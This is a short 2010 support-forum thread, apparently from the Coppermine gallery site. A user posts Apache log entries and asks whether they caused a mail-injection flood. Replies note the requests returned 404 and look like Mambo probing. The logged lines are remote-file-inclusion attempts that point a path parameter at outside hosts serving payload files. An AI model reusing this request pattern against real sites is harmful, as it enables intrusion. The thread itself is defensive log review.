Hacking Attempt??

Kymmy · January 02, 2010, 04:05:41 PM

Just had a load of direct mail entries from my apache (20,000+) and just looked through all my web logs.. Only thing strange I could find about the same time was this

Code Select

187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 303 "-" "Mozilla/5.0"

and

Code Select

61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 308 "-" "Mozilla/5.0"

Is this a problem with coppermine? and could this have caused the mail injection?

System details are as follows
Coppermine = 1.4.25 (stable) (bridged on phpbb3.5)
php = 5.2.11
Mysql = 5.0.86
Server = Centos 5.4

Nibbler · January 02, 2010, 05:37:16 PM

They are all 404 - nothing happened.

Kymmy · January 02, 2010, 07:51:51 PM

Quote from: Nibbler on January 02, 2010, 05:37:16 PM
They are all 404 - nothing happened.

Off I go looking elsewhere then, something has let it in.. ThanX for the quick answer

Joachim Müller · January 03, 2010, 12:20:48 AM

Looks like someone is probing for a Mambo weakness as far as I can see.

coppermine-gallery.com/forum

News:

Hacking Attempt??

Kymmy

Nibbler

Kymmy

Joachim Müller